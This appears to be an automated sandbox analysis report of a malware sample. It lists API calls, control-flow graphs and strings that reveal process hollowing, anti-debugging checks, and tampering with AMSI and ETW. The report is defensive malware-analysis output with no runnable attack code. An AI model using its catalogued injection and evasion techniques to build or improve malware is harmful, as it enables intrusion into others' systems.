39658 2cf4860 11 API calls 39657->39658 39661 2d09b09 39658->39661 39660 2cf47ec 11 API calls 39659->39660 39663 2d09dc3 39660->39663 39662 2cf47ec 11 API calls 39661->39662 39666 2d09b3a 39662->39666 39664 2d089d0 20 API calls 39663->39664 39665 2d09de7 
39664->39665 39667 2cf4860 11 API calls 39665->39667 39668 2d089d0 20 API calls 39666->39668 39671 2d09e03 39667->39671 39669 2d09b5e 39668->39669 39879 2d07a2c 39669->39879 39672 2cf47ec 11 API calls 39671->39672 39673 2d09e34 39672->39673 39674 2d089d0 20 API calls 39673->39674 39675 2d09e58 39674->39675 39893 2d08c80 39675->39893 39677 2cf4860 11 API calls 39679 2d09edf 39677->39679 39678 2d09e5f 39678->39677 39680 2cf47ec 11 API calls 39679->39680 39681 2d09f10 39680->39681 39682 2d089d0 20 API calls 39681->39682 39683 2d09f34 39682->39683 39684 2cf4860 11 API calls 39683->39684 39685 2d09f50 39684->39685 39686 2cf47ec 11 API calls 39685->39686 39687 2d09f81 39686->39687 39688 2d089d0 20 API calls 39687->39688 39689 2d09fa5 39688->39689 39690 2cf4860 11 API calls 39689->39690 39691 2d09fc1 39690->39691 39692 2cf47ec 11 API calls 39691->39692 39693 2d09ff2 39692->39693 39694 2d089d0 20 API calls 39693->39694 39695 2d0a016 39694->39695 39696 2d07d78 18 API calls 39695->39696 39697 2d0a033 39696->39697 39698 2cf4860 11 API calls 39697->39698 39699 2d0a04f 39698->39699 39700 2cf47ec 11 API calls 39699->39700 39701 2d0a080 39700->39701 39702 2d089d0 20 API calls 39701->39702 39703 2d0a0a4 39702->39703 39704 2cf4860 11 API calls 39703->39704 39705 2d0a0c0 39704->39705 39706 2cf47ec 11 API calls 39705->39706 39707 2d0a0f1 39706->39707 39708 2d089d0 20 API calls 39707->39708 39709 2d0a115 39708->39709 39710 2cf4860 11 API calls 39709->39710 39711 2d0a131 39710->39711 39712 2cf47ec 11 API calls 39711->39712 39713 2d0a162 39712->39713 39714 2d089d0 20 API calls 39713->39714 39715 2d0a186 39714->39715 39716 2d07d78 18 API calls 39715->39716 39717 2d0a1a6 39716->39717 39718 2cf4860 11 API calls 39717->39718 39719 2d0a1c2 39718->39719 39720 2cf47ec 11 API calls 39719->39720 39721 2d0a1f3 39720->39721 39722 2d089d0 20 API calls 39721->39722 39723 2d0a217 39722->39723 39724 2cf4860 11 API calls 39723->39724 39725 2d0a233 39724->39725 39726 2cf47ec 11 API calls 39725->39726 
39727 2d0a264 39726->39727 39728 2d089d0 20 API calls 39727->39728 39729 2d0a288 39728->39729 39730 2cf4860 11 API calls 39729->39730 39731 2d0a2a4 39730->39731 39732 2cf47ec 11 API calls 39731->39732 39733 2d0a2d5 39732->39733 39734 2d089d0 20 API calls 39733->39734 39735 2d0a2f9 SetThreadContext NtResumeThread 39734->39735 39736 2cf4860 11 API calls 39735->39736 39737 2d0a345 39736->39737 39738 2cf47ec 11 API calls 39737->39738 39739 2d0a376 39738->39739 39740 2d089d0 20 API calls 39739->39740 39741 2d0a39a 39740->39741 39742 2cf4860 11 API calls 39741->39742 39743 2d0a3b6 39742->39743 39744 2cf47ec 11 API calls 39743->39744 39745 2d0a3e7 39744->39745 39746 2d089d0 20 API calls 39745->39746 39747 2d0a40b 39746->39747 39748 2cf4860 11 API calls 39747->39748 39749 2d0a427 39748->39749 39750 2cf47ec 11 API calls 39749->39750 39751 2d0a458 39750->39751 39752 2d089d0 20 API calls 39751->39752 39753 2d0a47c 39752->39753 39754 2cf4860 11 API calls 39753->39754 39755 2d0a498 39754->39755 39756 2cf47ec 11 API calls 39755->39756 39757 2d0a4c9 39756->39757 39758 2d089d0 20 API calls 39757->39758 39759 2d0a4ed 39758->39759 39760 2cf2c2c 11 API calls 39759->39760 39761 2d0a4fc 39760->39761 39762 2cf4860 11 API calls 39761->39762 39763 2d0a51e 39762->39763 39764 2cf47ec 11 API calls 39763->39764 39765 2d0a54f 39764->39765 39766 2d089d0 20 API calls 39765->39766 39767 2d0a573 39766->39767 39768 2d0894c 21 API calls 39767->39768 39769 2d0a587 39768->39769 39770 2d0894c 21 API calls 39769->39770 39771 2d0a59b 39770->39771 39772 2d0894c 21 API calls 39771->39772 39773 2d0a5af 39772->39773 39774 2cf4860 11 API calls 39773->39774 39775 2d0a5cb 39774->39775 39776 2cf47ec 11 API calls 39775->39776 39777 2d0a5fc 39776->39777 39778 2d089d0 20 API calls 39777->39778 39779 2d0a620 39778->39779 39780 2d0894c 21 API calls 39779->39780 39781 2d0a634 39780->39781 39782 2d0894c 21 API calls 39781->39782 39783 2d0a648 39782->39783 39784 2cf4860 11 API calls 39783->39784 39785 2d0a664 
APIs
• InetIsOffline.URL(00000000,00000000,02D1B784,?,?,?,00000000,00000000), ref: 02D0F801
  • Part of subcall function 02D089D0: FreeLibrary.KERNEL32(75470000,00000000,00000000,00000000,00000000,02D7738C,Function_0000662C,00000004,02D7739C,02D7738C,05F5E103,00000040,02D773A0,75470000,00000000,00000000), ref: 02D08AAA
  • Part of subcall function 02D0F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02D0FAEB,UacInitialize,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,ScanBuffer,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8,Initialize), ref: 02D0F6EE
  • Part of subcall function 02D0F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02D0F700
  • Part of subcall function 02D0F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02D0F754
  • Part of subcall function 02D0F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02D0F766
  • Part of subcall function 02D0F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02D0F77D
  • Part of subcall function 02CF7E5C: GetFileAttributesA.KERNEL32(00000000,?,02D1041F,ScanString,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8,UacScan,02D77380,02D1B7B8,UacInitialize), ref: 02CF7E67
  • Part of subcall function 02CFC364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E6B8B8,?,02D10751,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,ScanBuffer,02D77380,02D1B7B8,OpenSession), ref: 02CFC37B
  • Part of subcall function 02D0DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D0DE40), ref: 02D0DDAB
  • Part of subcall function 02D0DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02D0DE40), ref: 02D0DDDB
  • Part of subcall function 02D0DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02D0DDF0
  • Part of subcall function 02D0DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02D0DE1C
  • Part of subcall function 02D0DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02D0DE25
  • Part of subcall function 02CF7E80: GetFileAttributesA.KERNEL32(00000000,?,02D1356F,ScanString,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,Initialize), ref: 02CF7E8B
  • Part of subcall function 02CF8048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02D1370D,OpenSession,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8,Initialize,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8), ref: 02CF8055
Strings
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                                                                                                                                                                                                                                                                                      • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$U
acScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
• API String ID: 297057983-2644593349
• Opcode ID: 558070e1eaf7092870ac3f423702126b671c5ef4da7e5c8061857e4035749ba8
• Instruction ID: ec32cf5cec9c2f809c0cbdb074dde59aef3a48a6d082ec2970894fac2b3f115b
• Opcode Fuzzy Hash: 558070e1eaf7092870ac3f423702126b671c5ef4da7e5c8061857e4035749ba8
• Instruction Fuzzy Hash: D4141C34A0425D9FDBA4EB64EC80ACF73BAFF85304F5040A6D609AB754DA30AE85DF51

Control-flow Graph

(graph rendering omitted)
APIs
  • Part of subcall function 02D089D0: FreeLibrary.KERNEL32(75470000,00000000,00000000,00000000,00000000,02D7738C,Function_0000662C,00000004,02D7739C,02D7738C,05F5E103,00000040,02D773A0,75470000,00000000,00000000), ref: 02D08AAA
  • Part of subcall function 02D08788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02D08814
• GetThreadContext.KERNEL32(00000908,02D77424,ScanString,02D773A8,02D0A93C,UacInitialize,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,UacInitialize,02D773A8), ref: 02D09602
  • Part of subcall function 02D08400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D08471
  • Part of subcall function 02D08670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02D086D5
  • Part of subcall function 02D07A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D07A9F
  • Part of subcall function 02D07D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D07DEC
• SetThreadContext.KERNEL32(00000908,02D77424,ScanBuffer,02D773A8,02D0A93C,ScanString,02D773A8,02D0A93C,Initialize,02D773A8,02D0A93C,00000910,0036EFF8,02D774FC,00000004,02D77500), ref: 02D0A317
• NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000908,00000000,00000908,02D77424,ScanBuffer,02D773A8,02D0A93C,ScanString,02D773A8,02D0A93C,Initialize,02D773A8,02D0A93C,00000910,0036EFF8,02D774FC), ref: 02D0A324
  • Part of subcall function 02D0894C: LoadLibraryW.KERNEL32(bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize,02D773A8,02D0A93C,UacScan), ref: 02D08960
  • Part of subcall function 02D0894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D0897A
  • Part of subcall function 02D0894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize), ref: 02D089B6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                                                                                                                                                                                                                                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2388221946-51457883
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 908e1b370ef5455a2d5f394744fcbc82045d4a0ea041782e59907dd48d073680
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 95865f8efb960aff6ad25233d5bec30f8ded80a517709585b4e4efe78cb70fb5
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 908e1b370ef5455a2d5f394744fcbc82045d4a0ea041782e59907dd48d073680
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3E2EE35F406199BDBA5FB64E8C1BCF73BAAF84300F5041A1A705AB364DA30AE49DF51

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 6883 2d08d6e-2d08d73 6885 2d08d78-2d08d7d 6883->6885 6885->6885 6886 2d08d7f-2d08e66 call 2cf4990 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 6885->6886 6917 2d0a8b7-2d0a921 call 2cf4500 * 2 call 2cf4c60 call 2cf4500 call 2cf44dc call 2cf4500 * 2 6886->6917 6918 2d08e6c-2d08f47 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 6886->6918 6918->6917 6962 2d08f4d-2d09275 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf30d4 * 2 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4de0 call 2cf4df0 call 2d08788 6918->6962 7071 2d09277-2d092e3 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 6962->7071 7072 2d092e8-2d09609 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf4860 call 2cf49a0 
call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf2ee0 call 2cf2f08 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 GetThreadContext 6962->7072 7071->7072 7072->6917 7180 2d0960f-2d09872 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d08400 7072->7180 7253 2d09878-2d099e1 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d08670 7180->7253 7254 2d09b7f-2d09beb call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 7180->7254 7344 2d099e3-2d09a09 call 2d07a2c 7253->7344 7345 2d09a0b-2d09a77 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 7253->7345 7281 2d09bf0-2d09d70 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d07a2c 7254->7281 7281->6917 7385 2d09d76-2d09e6f call 2cf4860 call 2cf49a0 call 
2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d08c80 7281->7385 7352 2d09a7c-2d09b7d call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d07a2c 7344->7352 7345->7352 7352->7281 7436 2d09e71-2d09ebe call 2d08b78 call 2d08b6c 7385->7436 7437 2d09ec3-2d0a8b2 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d07d78 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d07d78 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 SetThreadContext NtResumeThread call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf2c2c call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d0894c * 3 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d0894c * 2 call 2cf4860 call 2cf49a0 
call 2cf47ec call 2cf49a0 call 2d0894c call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c * 5 call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2d08080 call 2d0894c * 2 7385->7437 7436->7437 7437->6917
APIs
  • Part of subcall function 02D089D0: FreeLibrary.KERNEL32(75470000,00000000,00000000,00000000,00000000,02D7738C,Function_0000662C,00000004,02D7739C,02D7738C,05F5E103,00000040,02D773A0,75470000,00000000,00000000), ref: 02D08AAA
  • Part of subcall function 02D08788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02D08814
• GetThreadContext.KERNEL32(00000908,02D77424,ScanString,02D773A8,02D0A93C,UacInitialize,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,UacInitialize,02D773A8), ref: 02D09602
  • Part of subcall function 02D08400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D08471
  • Part of subcall function 02D08670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02D086D5
  • Part of subcall function 02D07A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D07A9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
• API String ID: 3386062106-51457883
• Opcode ID: 5b9e0ed12ba40916369d8b83e126ee7c68f68c62a5360e370e2ed9e8ac0c96b9
• Instruction ID: 824d94483d28141ac6c6aa5eea8f8504cf30b4b35dbc9f925cfcd8e9b9f6036b
• Opcode Fuzzy Hash: 5b9e0ed12ba40916369d8b83e126ee7c68f68c62a5360e370e2ed9e8ac0c96b9
• Instruction Fuzzy Hash: FBE2EE35F406199BDBA5FB64E8C1BCF73BAAF84300F5041A1A705AB364DA30AE49DF51

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 10945 2cf5acc-2cf5b0d GetModuleFileNameA RegOpenKeyExA 10946 2cf5b4f-2cf5b92 call 2cf5908 RegQueryValueExA 10945->10946 10947 2cf5b0f-2cf5b2b RegOpenKeyExA 10945->10947 10952 2cf5bb6-2cf5bd0 RegCloseKey 10946->10952 10953 2cf5b94-2cf5bb0 RegQueryValueExA 10946->10953 10947->10946 10948 2cf5b2d-2cf5b49 RegOpenKeyExA 10947->10948 10948->10946 10950 2cf5bd8-2cf5c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10948->10950 10954 2cf5c0f-2cf5c13 10950->10954 10955 2cf5cf2-2cf5cf9 10950->10955 10953->10952 10956 2cf5bb2 10953->10956 10958 2cf5c1f-2cf5c35 lstrlenA 10954->10958 10959 2cf5c15-2cf5c19 10954->10959 10956->10952 10960 2cf5c38-2cf5c3b 10958->10960 10959->10955 10959->10958 10961 2cf5c3d-2cf5c45 10960->10961 10962 2cf5c47-2cf5c4f 10960->10962 10961->10962 10963 2cf5c37 10961->10963 10962->10955 10964 2cf5c55-2cf5c5a 10962->10964 10963->10960 10965 2cf5c5c-2cf5c82 lstrcpynA LoadLibraryExA 10964->10965 10966 2cf5c84-2cf5c86 10964->10966 10965->10966 10966->10955 10967 2cf5c88-2cf5c8c 10966->10967 10967->10955 10968 2cf5c8e-2cf5cbe lstrcpynA LoadLibraryExA 10967->10968 10968->10955 10969 2cf5cc0-2cf5cf0 lstrcpynA LoadLibraryExA 10968->10969 10969->10955
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000105,02CF0000,02D1E790), ref: 02CF5AE8
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02CF0000,02D1E790), ref: 02CF5B06
• RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02CF0000,02D1E790), ref: 02CF5B24
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02CF5B42
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02CF5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02CF5B8B
